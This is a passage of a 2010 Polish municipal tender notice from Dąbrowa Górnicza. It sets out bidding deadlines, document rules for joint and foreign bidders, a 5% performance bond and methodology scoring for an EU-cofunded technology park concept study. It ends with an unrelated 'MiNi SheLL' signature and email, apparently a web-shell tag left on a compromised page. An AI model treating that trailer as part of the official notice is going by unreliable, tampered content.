<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Inwestycji Miejskich, piętro II, pok. nr 222..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 26.05.2010 godzina 09:30, miejsce: Urząd Miejski w Dąbrowie Górniczej, ul. Graniczna 21, Wydział Inwestycji Miejskich, piętro II, pok. nr 222..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> I. Projekt współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Poddziałania 6.2.2. Programu Operacyjnego  Innowacyjna Gospodarka na lata 2007 - 2013.

II. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia.
1. Wykonawcy wspólnie ubiegający się o udzielenie niniejszego zamówienia powinni spełniać warunki udziału w postępowaniu określone w punkcie 8 SIWZ oraz złożyć dokumenty i oświadczenia potwierdzające spełnianie tych warunków zgodnie z zapisami zawartymi w punkcie 9 SIWZ.
2. W przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców, w ofercie muszą być złożone dokumenty i oświadczenia wymienione w pkt. 9.2. SIWZ przez  każdego z  nich.
3.	Dokumenty i oświadczenia  wymienione w  pkt. 9.1.2. do 9.1.4. SIWZ Wykonawcy składają wspólnie.
Oświadczenie wymienione w pkt. 9.1.1. SIWZ, formularz ofertowy wymieniony w pkt. 9.4.1. SIWZ, formularz harmonogramu prac wymieniony w pkt. 9.4.4. SIWZ oraz formularz wyceny prac wymieniony w pkt. 9.4.5. SIWZ winny być podpisane przez uprawnionych przedstawicieli Wykonawców. 
4. Ponadto ww. Wykonawcy ustanawiają Pełnomocnika do reprezentowania ich w niniejszym postępowaniu albo reprezentowania ich w postępowania i zawarcia umowy w sprawie zamówienia publicznego. 
5. Wszelka korespondencja prowadzona będzie wyłącznie z  Pełnomocnikiem

III. Uwagi do dokumentów, w tym dotyczące podmiotów zagranicznych:
1.	Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. 9.2.2., 9.2.3., 9.2.4. SIWZ składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
2.	Dokumenty, o którym mowa w pkt. 1 lit. a) Uwag, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert, dokumenty, o których mowa w pkt. 1 lit. b) Uwag, powinny być wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
3.	Jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa pkt. 1 Uwag zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Wymagania pkt. 2 Uwag stosuje się odpowiednio.
4.	W przypadku wątpliwości co do treści dokumentu złożonego przez wykonawcę mającego siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamawiający może zwrócić się do właściwych organów odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania z wnioskiem o udzielenie niezbędnych informacji dotyczących przedłożonego dokumentu.
5.	Dokumenty są składane w oryginale lub kopii poświadczonej za zgodność z oryginałem przez wykonawcę. 
6.	W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia oraz w przypadku podmiotów, na zasobach których na zasadach określonych w art. 26 ust. 2b Ustawy polega wykonawca, kopie dokumentów dotyczących odpowiednio wykonawcy lub tych podmiotów są poświadczane za zgodność z oryginałem przez wykonawcę lub te podmioty.
7.	Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski.
8.	Zamawiający może żądać przedstawienia oryginału lub notarialnie poświadczonej kopii dokumentu wyłącznie wtedy, gdy złożona kopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości.
9.	Wykonawca składa oświadczenia i dokumenty przetargowe pod odpowiedzialnością karną wynikającą z art. 297 Kodeksu Karnego. W razie stwierdzenia, że złożone przez Wykonawcę informacje są nieprawdziwe Zamawiający zgodnie  z dyspozycją art. 304 k.p.k. - zawiadomi o tym fakcie właściwy organ ścigania.
10.	 Dokumenty wchodzące w skład oferty, w tym również te przedstawione w formie oryginałów, nie podlegają zwrotowi przez Zamawiającego. 
 
IV. Wymagania dotyczące zabezpieczenia należytego wykonania umowy.
Zamawiający wymaga wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny brutto podanej w ofercie.

V. Uściślenie kryterium - Metodyka realizacji prac (M) - oceniane będzie poprzez:
 - M1. Zgodność oferty sporządzenia dokumentów szczegółowych prezentujących metodykę realizacji prac składających się na Koncepcję z zakresem metodycznym przedmiotu zamówienia - metodyka wykonania dokumentów szczegółowych.
- M2. Zgodność wewnętrzna (spójność) Studium wykonalności.
- M3. Wielowariantowość: Koncepcji programowo-organizacyjnej, Koncepcji funkcjonalno-użytkowej, Studium wykonalności.
- M4. Weryfikowalność harmonogramu realizacji prac.

Ad. M1. Zgodność oferty sporządzenia dokumentów szczegółowych prezentujących metodykę realizacji prac (wg pkt. 8.3. SIWZ) składających się na Koncepcję z zakresem metodycznym przedmiotu zamówienia - metodyka wykonania dokumentów szczegółowych - rozumiana jako struktura dokumentów szczegółowych wraz z szczegółowym opisem właściwych metod i analiz służących realizacji elementów przedmiotu zamówienia.

Ad M2. Zgodność wewnętrzna, (spójność) Studium wykonalności - oznacza, iż struktura Studium wykonalności (opisana w dokumentach prezentujących proponowaną metodykę realizacji prac wg pkt. 8.3. SIWZ) wraz z opisem towarzyszących jej metod i analiz stanowią logiczną, konsekwentną całość, tj. ich poszczególne elementy wspomagają się wzajemnie.

Ad M3. Wielowariantowość Koncepcji programowo-organizacyjnej, Koncepcji funkcjonalno-użytkowej, Studium wykonalności - oznacza możliwość wykorzystania Koncepcji w zmieniających się uwarunkowaniach prawno-organizacyjnych, technicznych, rynkowych, finansowych.

Ad M4. Weryfikowalność harmonogramu realizacji prac oznacza, iż zadania składające się na harmonogram realizacji prac wykonawcy Koncepcji posiadają sprecyzowane terminy wykonania w relacji do poszczególnych elementów dokumentów szczegółowych oraz wskaźniki ewaluacji umożliwiające pomiar stopnia realizacji zadania - zaś zakładany poziom wskaźników ewaluacji umożliwia pomiar stopnia realizacji zadań.

Kryterium Metodyka realizacji prac - oceniane będzie wg wzoru:
	           Uzyskana przez Wykonawcę liczba punktów
M = 	        dla poszczególnych składowych M1, M2, M3, M4             x           50% 
		                  kryterium Metodyka realizacji prac

Ilość punktów uzyskana przez oferty dla kryterium Metodyka realizacji prac (M) będzie zaokrąglona do czterech miejsc po przecinku.
Szczegółowy sposób oceny kryteriów stanowi Załącznik nr 9 do SIWZ.
VI. Uszczegółowienia terminu zakończenia realizacji zamówienia:	w ciągu 4 miesięcy od dnia podpisania umowy, zgodnie z formularzem harmonogramu prac  stanowiącym załącznik nr 8 do SIWZ
VII. Pełna nazwa zadania nadana przez Zamawiającego:
Koncepcja utworzenia, organizacji i funkcjonowania kompleksu: inkubator nowych technologii wraz z parkiem naukowo-technologicznym, na  terenie inwestycyjnym TUCZNAWA B w Dąbrowie Górniczej, w ramach projektu:  Kompleksowe przygotowanie terenu inwestycyjnego TUCZNAWA -  DĄBROWSKA STREFA AKTYWNOŚCI GOSPODARCZEJ (TUCZNAWA B) współfinansowanego  przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Poddziałania 6.2.2. Programu Operacyjnego  Innowacyjna Gospodarka na lata 2007 - 2013, w ramach zadania inwestycyjnego: Kompleksowe przygotowanie terenu inwestycyjnego - Tucznawa wraz z budową układu komunikacyjnego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com